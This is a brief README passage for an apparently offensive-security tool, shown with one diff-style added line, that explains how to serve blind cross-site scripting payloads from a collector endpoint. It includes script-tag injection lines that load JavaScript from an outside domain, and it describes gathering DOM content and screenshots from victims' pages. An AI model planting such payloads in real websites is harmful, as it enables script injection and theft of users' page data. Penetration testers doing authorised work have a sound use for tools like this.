pichik/pfolio/README.md

 This endpoint will contain response specified in `assets/extensions.json` file

 **Example:**
 if you specified `"CollectorPath":"example"` in config file and set .js extensions with payload `alert(1)` in `assets/extensions.json`
 and insert this payload to the website, alert will popup.
 `<script src=https://domain.com/example.js></script>`

 ### Collecting data from blind XSS
+You can find detailed report for your XSS, with DOM and Screenshort.
 `<script src=https://example.com></script>`
 ![blind xss](_img/blindxss.png)